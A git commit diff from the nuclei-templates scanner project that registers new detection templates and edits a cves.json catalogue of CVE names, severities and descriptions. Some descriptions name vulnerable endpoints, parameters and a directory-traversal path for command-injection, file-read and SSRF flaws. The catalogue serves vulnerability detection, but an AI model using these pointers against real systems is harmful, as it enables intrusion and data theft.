Merge branch 'k8s-templates' of https://github.com/projectdiscovery/nuclei-templates into k8s-templates
commit
aebf341dc6
|
@ -4,21 +4,36 @@ on:
|
||||||
paths:
|
paths:
|
||||||
- '.new-additions'
|
- '.new-additions'
|
||||||
- 'cloud/aws/sns/sns-public-subscribe-access.yaml'
|
- 'cloud/aws/sns/sns-public-subscribe-access.yaml'
|
||||||
|
- 'dast/vulnerabilities/sqli/time-based-sqli.yaml'
|
||||||
- 'http/cves/2021/CVE-2021-38146.yaml'
|
- 'http/cves/2021/CVE-2021-38146.yaml'
|
||||||
- 'http/cves/2021/CVE-2021-38147.yaml'
|
- 'http/cves/2021/CVE-2021-38147.yaml'
|
||||||
|
- 'http/cves/2021/CVE-2021-43831.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-32068.yaml'
|
||||||
- 'http/cves/2023/CVE-2023-38194.yaml'
|
- 'http/cves/2023/CVE-2023-38194.yaml'
|
||||||
- 'http/cves/2023/CVE-2023-43472.yaml'
|
- 'http/cves/2023/CVE-2023-43472.yaml'
|
||||||
|
- 'http/cves/2023/CVE-2023-51449.yaml'
|
||||||
- 'http/cves/2023/CVE-2023-6505.yaml'
|
- 'http/cves/2023/CVE-2023-6505.yaml'
|
||||||
- 'http/cves/2023/CVE-2023-6786.yaml'
|
- 'http/cves/2023/CVE-2023-6786.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-0250.yaml'
|
- 'http/cves/2024/CVE-2024-0250.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-1728.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-23692.yaml'
|
- 'http/cves/2024/CVE-2024-23692.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-2621.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-28995.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-31750.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-32113.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-3274.yaml'
|
||||||
|
- 'http/cves/2024/CVE-2024-36837.yaml'
|
||||||
- 'http/cves/2024/CVE-2024-37393.yaml'
|
- 'http/cves/2024/CVE-2024-37393.yaml'
|
||||||
- 'http/exposed-panels/lorex-panel.yaml'
|
- 'http/exposed-panels/lorex-panel.yaml'
|
||||||
- 'http/exposed-panels/oracle-application-server-panel.yaml'
|
- 'http/exposed-panels/oracle-application-server-panel.yaml'
|
||||||
|
- 'http/exposed-panels/turnkey-lamp-panel.yaml'
|
||||||
- 'http/exposed-panels/veeam-backup-manager-login.yaml'
|
- 'http/exposed-panels/veeam-backup-manager-login.yaml'
|
||||||
- 'http/exposed-panels/wildix-collaboration-panel.yaml'
|
- 'http/exposed-panels/wildix-collaboration-panel.yaml'
|
||||||
- 'http/misconfiguration/apache/apache-server-status-localhost.yaml'
|
- 'http/misconfiguration/apache/apache-server-status-localhost.yaml'
|
||||||
|
- 'http/misconfiguration/cookies-without-secure.yaml'
|
||||||
- 'http/technologies/nperf-server-detect.yaml'
|
- 'http/technologies/nperf-server-detect.yaml'
|
||||||
|
- 'http/vulnerabilities/gradio/gradio-lfi.yaml'
|
||||||
|
- 'http/vulnerabilities/gradio/gradio-ssrf.yaml'
|
||||||
- 'network/detection/mikrotik-ssh-detect.yaml'
|
- 'network/detection/mikrotik-ssh-detect.yaml'
|
||||||
workflow_dispatch:
|
workflow_dispatch:
|
||||||
jobs:
|
jobs:
|
||||||
|
|
|
@ -1,17 +1,32 @@
|
||||||
cloud/aws/sns/sns-public-subscribe-access.yaml
|
cloud/aws/sns/sns-public-subscribe-access.yaml
|
||||||
|
dast/vulnerabilities/sqli/time-based-sqli.yaml
|
||||||
http/cves/2021/CVE-2021-38146.yaml
|
http/cves/2021/CVE-2021-38146.yaml
|
||||||
http/cves/2021/CVE-2021-38147.yaml
|
http/cves/2021/CVE-2021-38147.yaml
|
||||||
|
http/cves/2021/CVE-2021-43831.yaml
|
||||||
|
http/cves/2023/CVE-2023-32068.yaml
|
||||||
http/cves/2023/CVE-2023-38194.yaml
|
http/cves/2023/CVE-2023-38194.yaml
|
||||||
http/cves/2023/CVE-2023-43472.yaml
|
http/cves/2023/CVE-2023-43472.yaml
|
||||||
|
http/cves/2023/CVE-2023-51449.yaml
|
||||||
http/cves/2023/CVE-2023-6505.yaml
|
http/cves/2023/CVE-2023-6505.yaml
|
||||||
http/cves/2023/CVE-2023-6786.yaml
|
http/cves/2023/CVE-2023-6786.yaml
|
||||||
http/cves/2024/CVE-2024-0250.yaml
|
http/cves/2024/CVE-2024-0250.yaml
|
||||||
|
http/cves/2024/CVE-2024-1728.yaml
|
||||||
http/cves/2024/CVE-2024-23692.yaml
|
http/cves/2024/CVE-2024-23692.yaml
|
||||||
|
http/cves/2024/CVE-2024-2621.yaml
|
||||||
|
http/cves/2024/CVE-2024-28995.yaml
|
||||||
|
http/cves/2024/CVE-2024-31750.yaml
|
||||||
|
http/cves/2024/CVE-2024-32113.yaml
|
||||||
|
http/cves/2024/CVE-2024-3274.yaml
|
||||||
|
http/cves/2024/CVE-2024-36837.yaml
|
||||||
http/cves/2024/CVE-2024-37393.yaml
|
http/cves/2024/CVE-2024-37393.yaml
|
||||||
http/exposed-panels/lorex-panel.yaml
|
http/exposed-panels/lorex-panel.yaml
|
||||||
http/exposed-panels/oracle-application-server-panel.yaml
|
http/exposed-panels/oracle-application-server-panel.yaml
|
||||||
|
http/exposed-panels/turnkey-lamp-panel.yaml
|
||||||
http/exposed-panels/veeam-backup-manager-login.yaml
|
http/exposed-panels/veeam-backup-manager-login.yaml
|
||||||
http/exposed-panels/wildix-collaboration-panel.yaml
|
http/exposed-panels/wildix-collaboration-panel.yaml
|
||||||
http/misconfiguration/apache/apache-server-status-localhost.yaml
|
http/misconfiguration/apache/apache-server-status-localhost.yaml
|
||||||
|
http/misconfiguration/cookies-without-secure.yaml
|
||||||
http/technologies/nperf-server-detect.yaml
|
http/technologies/nperf-server-detect.yaml
|
||||||
|
http/vulnerabilities/gradio/gradio-lfi.yaml
|
||||||
|
http/vulnerabilities/gradio/gradio-ssrf.yaml
|
||||||
network/detection/mikrotik-ssh-detect.yaml
|
network/detection/mikrotik-ssh-detect.yaml
|
||||||
|
|
11
cves.json
11
cves.json
|
@ -669,7 +669,6 @@
|
||||||
{"ID":"CVE-2019-12581","Info":{"Name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","Severity":"medium","Description":"Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12581.yaml"}
|
{"ID":"CVE-2019-12581","Info":{"Name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","Severity":"medium","Description":"Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12581.yaml"}
|
||||||
{"ID":"CVE-2019-12583","Info":{"Name":"Zyxel ZyWall UAG/USG - Account Creation Access","Severity":"critical","Description":"Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the \"Free Time\" component. This can lead to unauthorized network access or DoS attacks.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2019/CVE-2019-12583.yaml"}
|
{"ID":"CVE-2019-12583","Info":{"Name":"Zyxel ZyWall UAG/USG - Account Creation Access","Severity":"critical","Description":"Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the \"Free Time\" component. This can lead to unauthorized network access or DoS attacks.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2019/CVE-2019-12583.yaml"}
|
||||||
{"ID":"CVE-2019-12593","Info":{"Name":"IceWarp Mail Server \u003c=10.4.4 - Local File Inclusion","Severity":"high","Description":"IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12593.yaml"}
|
{"ID":"CVE-2019-12593","Info":{"Name":"IceWarp Mail Server \u003c=10.4.4 - Local File Inclusion","Severity":"high","Description":"IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12593.yaml"}
|
||||||
{"ID":"CVE-2019-12616","Info":{"Name":"phpMyAdmin \u003c4.9.0 - Cross-Site Request Forgery","Severity":"medium","Description":"phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken \u003cimg\u003e tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-12616.yaml"}
|
|
||||||
{"ID":"CVE-2019-12725","Info":{"Name":"Zeroshell 3.9.0 - Remote Command Execution","Severity":"critical","Description":"Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12725.yaml"}
|
{"ID":"CVE-2019-12725","Info":{"Name":"Zeroshell 3.9.0 - Remote Command Execution","Severity":"critical","Description":"Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12725.yaml"}
|
||||||
{"ID":"CVE-2019-12962","Info":{"Name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","Severity":"medium","Description":"LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12962.yaml"}
|
{"ID":"CVE-2019-12962","Info":{"Name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","Severity":"medium","Description":"LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-12962.yaml"}
|
||||||
{"ID":"CVE-2019-12985","Info":{"Name":"Citrix SD-WAN Center - Remote Command Injection","Severity":"critical","Description":"Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12985.yaml"}
|
{"ID":"CVE-2019-12985","Info":{"Name":"Citrix SD-WAN Center - Remote Command Injection","Severity":"critical","Description":"Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-12985.yaml"}
|
||||||
|
@ -1467,6 +1466,7 @@
|
||||||
{"ID":"CVE-2021-43778","Info":{"Name":"GLPI plugin Barcode \u003c 2.6.1 - Path Traversal Vulnerability.","Severity":"high","Description":"Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43778.yaml"}
|
{"ID":"CVE-2021-43778","Info":{"Name":"GLPI plugin Barcode \u003c 2.6.1 - Path Traversal Vulnerability.","Severity":"high","Description":"Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43778.yaml"}
|
||||||
{"ID":"CVE-2021-43798","Info":{"Name":"Grafana v8.x - Arbitrary File Read","Severity":"high","Description":"Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `\u003cgrafana_host_url\u003e/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43798.yaml"}
|
{"ID":"CVE-2021-43798","Info":{"Name":"Grafana v8.x - Arbitrary File Read","Severity":"high","Description":"Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `\u003cgrafana_host_url\u003e/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43798.yaml"}
|
||||||
{"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43810.yaml"}
|
{"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43810.yaml"}
|
||||||
|
{"ID":"CVE-2021-43831","Info":{"Name":"Gradio \u003c 2.5.0 - Arbitrary File Read","Severity":"high","Description":"Files on the host computer can be accessed from the Gradio interface\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2021/CVE-2021-43831.yaml"}
|
||||||
{"ID":"CVE-2021-44077","Info":{"Name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44077.yaml"}
|
{"ID":"CVE-2021-44077","Info":{"Name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44077.yaml"}
|
||||||
{"ID":"CVE-2021-44138","Info":{"Name":"Caucho Resin \u003e=4.0.52 \u003c=4.0.56 - Directory traversal","Severity":"high","Description":"There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44138.yaml"}
|
{"ID":"CVE-2021-44138","Info":{"Name":"Caucho Resin \u003e=4.0.52 \u003c=4.0.56 - Directory traversal","Severity":"high","Description":"There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44138.yaml"}
|
||||||
{"ID":"CVE-2021-44139","Info":{"Name":"Alibaba Sentinel - Server-side request forgery (SSRF)","Severity":"high","Description":"There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44139.yaml"}
|
{"ID":"CVE-2021-44139","Info":{"Name":"Alibaba Sentinel - Server-side request forgery (SSRF)","Severity":"high","Description":"There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44139.yaml"}
|
||||||
|
@ -2142,6 +2142,7 @@
|
||||||
{"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"}
|
{"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"}
|
||||||
{"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"}
|
{"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"}
|
||||||
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
|
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
|
||||||
|
{"ID":"CVE-2023-32068","Info":{"Name":"XWiki - Open Redirect","Severity":"medium","Description":"XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-32068.yaml"}
|
||||||
{"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"}
|
{"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"}
|
||||||
{"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"}
|
{"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"}
|
||||||
{"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"}
|
{"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"}
|
||||||
|
@ -2156,7 +2157,6 @@
|
||||||
{"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"}
|
{"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"}
|
||||||
{"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
|
{"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
|
||||||
{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
|
{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
|
||||||
{"ID":"CVE-2023-33584","Info":{"Name":"Enrollment System Project v1.0 - SQL Injection Authentication Bypass","Severity":"critical","Description":"Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33584.yaml"}
|
|
||||||
{"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"}
|
{"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"}
|
||||||
{"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"}
|
{"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"}
|
||||||
{"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"}
|
{"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"}
|
||||||
|
@ -2319,6 +2319,7 @@
|
||||||
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
|
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
|
||||||
{"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"}
|
{"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"}
|
||||||
{"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"}
|
